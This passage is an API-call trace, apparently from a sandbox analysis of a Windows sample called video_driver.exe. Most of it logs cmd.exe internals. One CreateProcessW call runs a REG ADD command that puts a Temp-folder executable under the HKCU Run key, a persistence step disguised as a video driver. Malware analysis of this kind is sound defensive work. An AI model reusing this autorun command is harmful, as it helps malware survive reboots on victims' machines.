lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f254 | out: lpFindFileData=0x24f254*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x542010 [0039.353] FindClose (in: hFindFile=0x542010 | out: hFindFile=0x542010) returned 1 [0039.353] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0039.353] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f254 | out: lpFindFileData=0x24f254*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x542010 [0039.353] FindClose (in: hFindFile=0x542010 | out: hFindFile=0x542010) returned 1 [0039.353] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0039.353] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0039.353] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0039.353] GetProcessHeap () returned 0x530000 [0039.353] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544d08 | out: hHeap=0x530000) returned 1 [0039.353] GetEnvironmentStringsW () returned 0x544218* [0039.353] GetProcessHeap () returned 0x530000 [0039.354] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb36) returned 0x545858 [0039.354] FreeEnvironmentStringsW (penv=0x544218) returned 1 [0039.354] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0039.354] GetProcessHeap () returned 0x530000 [0039.354] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5457f8 | out: hHeap=0x530000) returned 1 [0039.354] GetProcessHeap () returned 0x530000 [0039.354] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400e) returned 0x546398 [0039.356] GetProcessHeap () returned 0x530000 [0039.356] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x118) returned 0x530ff0 [0039.357] GetProcessHeap () returned 0x530000 [0039.357] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546398 | out: hHeap=0x530000) returned 1 [0039.357] GetConsoleOutputCP () returned 0x1b5 [0039.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8b4260 | out: lpCPInfo=0x4a8b4260) returned 1 [0039.357] GetUserDefaultLCID () returned 0x409 [0039.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a8b4950, cchData=8 | out: lpLCData=":") returned 2 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f618, cchData=128 | out: lpLCData="0") returned 2 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f618, cchData=128 | out: lpLCData="0") returned 2 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f618, cchData=128 | out: lpLCData="1") returned 2 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a8b4940, cchData=8 | out: lpLCData="/") returned 2 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a8b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a8b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a8b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a8b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a8b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a8b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a8b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a8b4930, cchData=8 | out: lpLCData=".") returned 2 [0039.358] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a8b4920, cchData=8 | out: lpLCData=",") returned 2 [0039.358] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0039.360] GetProcessHeap () returned 0x530000 [0039.360] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20c) returned 0x542ee8 [0039.360] GetConsoleTitleW (in: lpConsoleTitle=0x542ee8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0039.360] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.360] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0039.360] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0039.361] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0039.361] GetProcessHeap () returned 0x530000 [0039.361] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x546398 [0039.361] GetProcessHeap () returned 0x530000 [0039.361] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4008) returned 0x54a3b0 [0039.362] GetProcessHeap () returned 0x530000 [0039.362] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x12) returned 0x531110 [0039.362] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0039.362] GetProcessHeap () returned 0x530000 [0039.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x531110 | out: hHeap=0x530000) returned 1 [0039.362] GetProcessHeap () returned 0x530000 [0039.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54a3b0 | out: hHeap=0x530000) returned 1 [0039.362] GetProcessHeap () returned 0x530000 [0039.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546398 | out: hHeap=0x530000) returned 1 [0039.362] _wcsicmp (_String1="REG", _String2=")") returned 73 [0039.362] _wcsicmp (_String1="FOR", _String2="REG") returned -12 [0039.362] _wcsicmp (_String1="FOR/?", _String2="REG") returned -12 [0039.362] _wcsicmp (_String1="IF", _String2="REG") returned -9 [0039.362] _wcsicmp (_String1="IF/?", _String2="REG") returned -9 [0039.362] _wcsicmp (_String1="REM", _String2="REG") returned 6 [0039.363] _wcsicmp (_String1="REM/?", _String2="REG") returned 6 [0039.363] GetProcessHeap () returned 0x530000 [0039.363] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x58) returned 0x531110 [0039.363] GetProcessHeap () returned 0x530000 [0039.363] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x540070 [0039.367] GetProcessHeap () returned 0x530000 [0039.367] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x14a) returned 0x531170 [0039.368] GetConsoleTitleW (in: lpConsoleTitle=0x24f310, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0039.368] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0039.368] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0039.368] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0039.368] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0039.368] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0039.368] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0039.368] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0039.369] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0039.369] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0039.369] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0039.369] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0039.369] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0039.369] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0039.369] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0039.369] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0039.369] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0039.369] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0039.369] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0039.369] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0039.369] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0039.369] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0039.369] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0039.369] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0039.369] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0039.369] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0039.369] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0039.369] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0039.369] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0039.369] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0039.369] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0039.369] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0039.369] _wcsicmp (_String1="REG", _String2="START") returned -1 [0039.369] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0039.369] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0039.369] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0039.369] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0039.370] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0039.370] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0039.370] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0039.370] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0039.370] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0039.370] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0039.370] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0039.370] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0039.370] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0039.370] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0039.370] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0039.370] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0039.370] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0039.370] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0039.370] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0039.370] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0039.370] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0039.370] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0039.370] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0039.370] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0039.370] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0039.370] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0039.370] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0039.370] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0039.370] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0039.370] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0039.370] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0039.370] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0039.371] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0039.371] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0039.371] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0039.371] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0039.371] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0039.371] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0039.371] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0039.371] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0039.371] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0039.371] _wcsicmp (_String1="REG", _String2="START") returned -1 [0039.371] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0039.371] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0039.371] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0039.371] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0039.371] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0039.371] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0039.371] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0039.371] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0039.371] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0039.371] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0039.371] _wcsicmp (_String1="REG", _String2="FOR") returned 12 [0039.371] _wcsicmp (_String1="REG", _String2="IF") returned 9 [0039.371] _wcsicmp (_String1="REG", _String2="REM") returned -6 [0039.372] GetProcessHeap () returned 0x530000 [0039.372] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x543100 [0039.372] GetProcessHeap () returned 0x530000 [0039.372] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x152) returned 0x543318 [0039.372] _wcsnicmp (_String1="REG", _String2="cmd ", _MaxCount=0x4) returned 15 [0039.372] GetProcessHeap () returned 0x530000 [0039.372] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x418) returned 0x544218 [0039.372] SetErrorMode (uMode=0x0) returned 0x0 [0039.372] SetErrorMode (uMode=0x1) returned 0x0 [0039.372] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x544220, lpFilePart=0x24ee30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24ee30*="Desktop") returned 0x25 [0039.372] SetErrorMode (uMode=0x0) returned 0x1 [0039.372] GetProcessHeap () returned 0x530000 [0039.372] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x544218, Size=0x5c) returned 0x544218 [0039.372] GetProcessHeap () returned 0x530000 [0039.372] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544218) returned 0x5c [0039.372] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0039.373] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.373] GetProcessHeap () returned 0x530000 [0039.373] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x120) returned 0x543478 [0039.373] GetProcessHeap () returned 0x530000 [0039.373] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x238) returned 0x544280 [0039.381] GetProcessHeap () returned 0x530000 [0039.381] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x544280, Size=0x122) returned 0x544280 [0039.381] GetProcessHeap () returned 0x530000 [0039.381] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544280) returned 0x122 [0039.381] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.381] GetProcessHeap () returned 0x530000 [0039.381] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe0) returned 0x5435a0 [0039.382] GetProcessHeap () returned 0x530000 [0039.382] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5435a0, Size=0x76) returned 0x5435a0 [0039.382] GetProcessHeap () returned 0x530000 [0039.382] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5435a0) returned 0x76 [0039.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.383] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x24ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ebac) returned 0xffffffff [0039.383] GetLastError () returned 0x2 [0039.383] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\REG", fInfoLevelId=0x1, lpFindFileData=0x24ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ebac) returned 0xffffffff [0039.383] GetLastError () returned 0x2 [0039.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x24ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ebac) returned 0x543620 [0039.384] GetProcessHeap () returned 0x530000 [0039.384] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x543660 [0039.384] FindClose (in: hFindFile=0x543620 | out: hFindFile=0x543620) returned 1 [0039.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x24ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ebac) returned 0xffffffff [0039.384] GetLastError () returned 0x2 [0039.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ebac) returned 0x543620 [0039.384] GetProcessHeap () returned 0x530000 [0039.384] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x543660, Size=0x4) returned 0x543660 [0039.384] FindClose (in: hFindFile=0x543620 | out: hFindFile=0x543620) returned 1 [0039.384] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0039.385] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0039.385] GetConsoleTitleW (in: lpConsoleTitle=0x24f0a4, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0039.385] InitializeProcThreadAttributeList (in: lpAttributeList=0x24ef2c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24eff4 | out: lpAttributeList=0x24ef2c, lpSize=0x24eff4) returned 1 [0039.385] UpdateProcThreadAttribute (in: lpAttributeList=0x24ef2c, dwFlags=0x0, Attribute=0x60001, lpValue=0x24efec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24ef2c, lpPreviousValue=0x0) returned 1 [0039.385] GetStartupInfoW (in: lpStartupInfo=0x24eee8 | out: lpStartupInfo=0x24eee8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x531a9c, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0039.385] GetProcessHeap () returned 0x530000 [0039.385] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x543620 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0039.385] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0039.386] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0039.386] GetProcessHeap () returned 0x530000 [0039.386] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x543620 | out: hHeap=0x530000) returned 1 [0039.386] GetProcessHeap () returned 0x530000 [0039.387] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa) returned 0x540088 [0039.387] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.388] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x24ef88*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24efd4 | out: lpCommandLine="REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f", lpProcessInformation=0x24efd4*(hProcess=0x78, hThread=0x74, dwProcessId=0x7b4, dwThreadId=0x90)) returned 1 [0039.399] CloseHandle (hObject=0x74) returned 1 [0039.399] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.399] GetProcessHeap () returned 0x530000 [0039.399] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545858 | out: hHeap=0x530000) returned 1 [0039.399] GetEnvironmentStringsW () returned 0x544520* [0039.399] GetProcessHeap () returned 0x530000 [0039.399] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb36) returned 0x545060 [0039.399] FreeEnvironmentStringsW (penv=0x544520) returned 1 [0039.399] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0039.496] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x24eec8 | out: lpExitCode=0x24eec8*=0x0) returned 1 [0039.496] CloseHandle (hObject=0x78) returned 1 [0039.496] _vsnwprintf (in: _Buffer=0x24f010, _BufferCount=0x13, _Format="%08X", _ArgList=0x24eed4 | out: _Buffer="00000000") returned 8 [0039.496] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0039.496] GetProcessHeap () returned 0x530000 [0039.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545060 | out: hHeap=0x530000) returned 1 [0039.496] GetEnvironmentStringsW () returned 0x544520* [0039.496] GetProcessHeap () returned 0x530000 [0039.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb5c) returned 0x545088 [0039.496] FreeEnvironmentStringsW (penv=0x544520) returned 1 [0039.497] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.497] GetProcessHeap () returned 0x530000 [0039.497] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545088 | out: hHeap=0x530000) returned 1 [0039.497] GetEnvironmentStringsW () returned 0x544520* [0039.497] GetProcessHeap () returned 0x530000 [0039.497] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb5c) returned 0x545088 [0039.497] FreeEnvironmentStringsW (penv=0x544520) returned 1 [0039.497] GetProcessHeap () returned 0x530000 [0039.497] HeapFree (in: 